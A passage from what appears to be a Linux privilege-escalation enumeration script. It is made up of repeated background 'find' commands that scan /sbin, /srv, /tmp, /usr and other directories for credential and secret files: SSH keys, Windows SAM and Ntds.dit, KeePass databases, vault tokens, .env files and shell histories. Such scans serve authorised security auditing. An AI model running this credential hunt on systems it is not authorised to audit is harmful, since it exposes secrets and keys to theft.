\"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_RUN=`eval_bckgrd "find /run -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SBIN=`eval_bckgrd "find /sbin -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SNAP=`eval_bckgrd "find /snap -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SRV=`eval_bckgrd "find /srv -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYS=`eval_bckgrd "find /sys -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"*.gnupg\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \"scheduledtasks.xml\" -o -name \"gvm-tools.conf\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"*.gpg\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"redis.conf\" -o -name \"sess_*\" -o -name \"php.ini\" -o -name \".k5login\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"*.gnupg\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name 